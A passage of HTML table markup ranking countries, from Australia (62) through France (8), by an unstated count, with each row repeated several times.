<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Australia </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>62</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Australia </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>62</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Australia </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>62</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>UK </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>59</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>UK </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>59</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>UK </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>59</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>UK </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>59</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>UK </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>59</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Japan </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>41</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Japan </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>41</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Japan </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>41</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Japan </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>41</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Japan </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>41</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Netherlands </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>20</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Netherlands </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>20</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Netherlands </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>20</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Netherlands </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>20</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Netherlands </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>20</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>New Zealand (Aotearoa) </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>18</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>New Zealand (Aotearoa) </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>18</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>New Zealand (Aotearoa) </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>18</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>New Zealand (Aotearoa) </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>18</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>New Zealand (Aotearoa) </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>18</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Germany </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>15</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Germany </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>15</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Germany </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>15</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Germany </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>15</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Germany </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>15</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Belgium </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>14</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Belgium </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>14</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Belgium </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>14</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Belgium </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>14</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Belgium </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>14</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Taiwan </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>11</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Taiwan </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>11</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Taiwan </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>11</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Taiwan </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>11</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Taiwan </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>11</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Sweden </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>10</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Sweden </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>10</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Sweden </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>10</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Sweden </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>10</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Sweden </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>10</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">12</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Denmark </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>10</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">12</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Denmark </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>10</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">12</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Denmark </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>10</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">12</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Denmark </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>10</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">12</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Denmark </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>10</B></TD></TR><TR BGCOLOR="#FFFFFF"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">13</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>France </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>8</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">13</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>France </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>8</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">13</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>France </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>8</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">13</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>France </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>8</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">13</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>France </B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>8</B></TD></TR><TR BGCOLOR="#F0F0F0"><TD> </TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"> </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"></TD></TR>
